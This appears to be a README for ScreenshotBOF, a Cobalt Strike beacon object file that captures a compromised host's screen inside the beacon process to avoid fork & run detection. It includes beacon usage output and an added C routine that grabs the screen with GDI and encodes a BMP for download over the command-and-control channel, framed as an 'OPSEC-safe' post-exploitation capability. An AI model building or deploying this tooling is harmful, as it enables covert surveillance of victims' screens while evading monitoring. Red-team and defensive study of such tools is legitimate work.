
ScreenshotBOF

An alternative screenshot capability for Cobalt Strike that uses WinAPI and does not perform a fork & run. The screenshot is kept in memory and can be downloaded directly over the beacon.

Self Compilation

  1. git clone the repo
  2. open the solution in Visual Studio
  3. build the BOF project

Save methods (the second argument of screenshot_bof):

  1. 0: drop the file to disk
  2. 1: download the file over the beacon (Cobalt Strike only)

Usage

  1. import the screenshotBOF.cna script into Cobalt Strike
  2. run screenshot_bof {local filename} {save method 0/1}, where 0 drops the file to disk and 1 downloads it over the beacon

    beacon> screenshot_bof sad.bmp 1
    [*] Running screenshot BOF by (@codex_tf2)
    [+] host called home, sent: 5267 bytes
    [+] received output:
    [*] Screen saved to bitmap
    [+] received output:
    [*] Downloading bitmap over beacon with filename sad.bmp
    [*] started download of sad.bmp

  3. if downloaded over the beacon, the BMP can be viewed in Cobalt Strike by right-clicking the download and choosing "Render BMP" (credit @BinaryFaultline)
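The step the README describes as "Screen saved to bitmap" is the part worth seeing in code: the raw pixels have to become a complete BMP file image in memory before they can be dropped to disk (save method 0) or handed to the beacon download channel (save method 1). The following is an added example, not ScreenshotBOF's own code, showing that encoder plus a plain GDI capture routine. The GDI routine (compiled only under _WIN32) is an assumed equivalent of the WinAPI capture the README mentions, not taken from the project; off Windows a constructed 3x2 test pattern stands in for the screen so the encoder can be run anywhere. Names such as encode_bmp_24, capture_screen_bgra and SAMPLE_BGRA are this example's own.

```c
/* Added example, not ScreenshotBOF's own code: build a BMP file image in memory
 * from a top-down 32-bit BGRA pixel buffer, which is the step a screenshot BOF
 * needs before it can either drop the capture to disk or stream it over the
 * beacon. On Windows, capture_screen_bgra() (compiled only under _WIN32) fills
 * that buffer with plain GDI calls; elsewhere a constructed 3x2 test pattern
 * stands in for the screen so the encoder can be exercised anywhere. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BMP_HEADER_SIZE 54u /* BITMAPFILEHEADER (14) + BITMAPINFOHEADER (40) */

static void put_u16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); }
static void put_u32(uint8_t *p, uint32_t v) { put_u16(p, (uint16_t)v); put_u16(p + 2, (uint16_t)(v >> 16)); }

/* BMP rows are padded to a multiple of 4 bytes. */
static size_t bmp_stride_24(uint32_t w) { return ((size_t)w * 3 + 3) & ~(size_t)3; }

/* Total size of the 24-bpp BMP that encode_bmp_24() produces for w x h pixels. */
size_t bmp_size_24(uint32_t w, uint32_t h) { return BMP_HEADER_SIZE + bmp_stride_24(w) * h; }

/* Encode a top-down BGRA buffer (4 bytes per pixel, row-major) as an uncompressed
 * 24-bpp BMP. Returns a malloc'd buffer of *out_len bytes, or NULL on failure. */
uint8_t *encode_bmp_24(const uint8_t *bgra, uint32_t w, uint32_t h, size_t *out_len) {
    size_t stride = bmp_stride_24(w), total = bmp_size_24(w, h);
    uint8_t *bmp = calloc(1, total); /* zeroed, so reserved fields and row padding are 0 */
    if (!bmp) return NULL;
    bmp[0] = 'B'; bmp[1] = 'M';                  /* BITMAPFILEHEADER */
    put_u32(bmp + 2, (uint32_t)total);           /* bfSize */
    put_u32(bmp + 10, BMP_HEADER_SIZE);          /* bfOffBits: pixel data follows both headers */
    put_u32(bmp + 14, 40);                       /* BITMAPINFOHEADER: biSize */
    put_u32(bmp + 18, w);                        /* biWidth */
    put_u32(bmp + 22, h);                        /* biHeight > 0 means rows are stored bottom-up */
    put_u16(bmp + 26, 1);                        /* biPlanes */
    put_u16(bmp + 28, 24);                       /* biBitCount */
    put_u32(bmp + 30, 0);                        /* biCompression = BI_RGB */
    put_u32(bmp + 34, (uint32_t)(stride * h));   /* biSizeImage */
    for (uint32_t y = 0; y < h; y++) {           /* write source rows in reverse order */
        const uint8_t *src = bgra + (size_t)(h - 1 - y) * w * 4;
        uint8_t *dst = bmp + BMP_HEADER_SIZE + stride * y;
        for (uint32_t x = 0; x < w; x++)         /* drop the alpha byte: BGRA -> BGR */
            memcpy(dst + x * 3, src + x * 4, 3);
    }
    *out_len = total;
    return bmp;
}

#ifdef _WIN32
#include <windows.h>
/* Capture the primary screen with GDI into a top-down BGRA buffer (caller frees).
 * A negative biHeight asks GetDIBits for top-down rows. This is an assumed
 * equivalent of the WinAPI capture the README describes, not the project's code. */
uint8_t *capture_screen_bgra(uint32_t *w, uint32_t *h) {
    HDC screen = GetDC(NULL);
    *w = (uint32_t)GetSystemMetrics(SM_CXSCREEN);
    *h = (uint32_t)GetSystemMetrics(SM_CYSCREEN);
    HDC mem = CreateCompatibleDC(screen);
    HBITMAP hbm = CreateCompatibleBitmap(screen, (int)*w, (int)*h);
    HGDIOBJ old = SelectObject(mem, hbm);
    BitBlt(mem, 0, 0, (int)*w, (int)*h, screen, 0, 0, SRCCOPY);
    SelectObject(mem, old);
    BITMAPINFO bi; ZeroMemory(&bi, sizeof bi);
    bi.bmiHeader.biSize = sizeof(BITMAPINFOHEADER);
    bi.bmiHeader.biWidth = (LONG)*w;
    bi.bmiHeader.biHeight = -(LONG)*h;
    bi.bmiHeader.biPlanes = 1;
    bi.bmiHeader.biBitCount = 32;
    bi.bmiHeader.biCompression = BI_RGB;
    uint8_t *buf = malloc((size_t)*w * *h * 4);
    if (buf && !GetDIBits(mem, hbm, 0, *h, buf, &bi, DIB_RGB_COLORS)) { free(buf); buf = NULL; }
    DeleteObject(hbm); DeleteDC(mem); ReleaseDC(NULL, screen);
    return buf;
}
#endif

/* Constructed 3x2 test pattern (top-down BGRA): top row red, bottom row blue. */
static const uint8_t SAMPLE_BGRA[2 * 3 * 4] = {
    0x00, 0x00, 0xFF, 0xFF,  0x00, 0x00, 0xFF, 0xFF,  0x00, 0x00, 0xFF, 0xFF,
    0xFF, 0x00, 0x00, 0xFF,  0xFF, 0x00, 0x00, 0xFF,  0xFF, 0x00, 0x00, 0xFF,
};

/* Encode the constructed pattern; stands in for a real capture off Windows. */
uint8_t *encode_sample_bmp(size_t *out_len) { return encode_bmp_24(SAMPLE_BGRA, 3, 2, out_len); }

int main(void) {
    uint32_t w = 3, h = 2;
    const uint8_t *pixels = SAMPLE_BGRA;
    uint8_t *shot = NULL;
#ifdef _WIN32
    uint32_t sw, sh;
    shot = capture_screen_bgra(&sw, &sh);
    if (shot) { pixels = shot; w = sw; h = sh; }
#endif
    size_t len = 0;
    uint8_t *bmp = encode_bmp_24(pixels, w, h, &len);
    if (!bmp) return 1;
    /* Save method 0 from the README: drop to disk. Method 1 would hand this same
     * buffer to the C2 download channel instead of touching the filesystem. */
    FILE *f = fopen("screenshot.bmp", "wb");
    if (f) { fwrite(bmp, 1, len, f); fclose(f); }
    printf("encoded %ux%u screenshot into %zu bytes\n", w, h, len);
    free(bmp); free(shot);
    return 0;
}
```

The encoder keeps the whole file in one heap buffer precisely so that the caller can choose between the two save methods after the fact: a single write for method 0, or the same bytes passed to the beacon's download path for method 1, with nothing touching disk. Note that nothing here is evasive; the GDI calls are the same ones any screen-recording tool makes, which is the README's point.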


Notes

  • no evasion is performed, which should be fine since the WinAPIs used for the screen capture are ordinary calls that are not malicious in themselves
  • the output is a BMP rather than a compressed image format, so a full-screen capture is large (on the order of megabytes), and with save method 1 all of it crosses the beacon channel

Why did I make this?

Cobalt Strike uses a technique known as fork & run for many of its post-ex capabilities, including the screenshot command: a sacrificial process is spawned and the capability is injected into it. While this behaviour provides stability (a crash in the injected capability does not take down the beacon), the spawn-and-inject pattern is now well known and heavily monitored. This BOF is meant to provide a more OPSEC-safe version of the screenshot capability by running the WinAPI capture inside the beacon process itself; the trade-off is that an error in the BOF can affect the beacon, since it no longer runs in a separate process.

Credits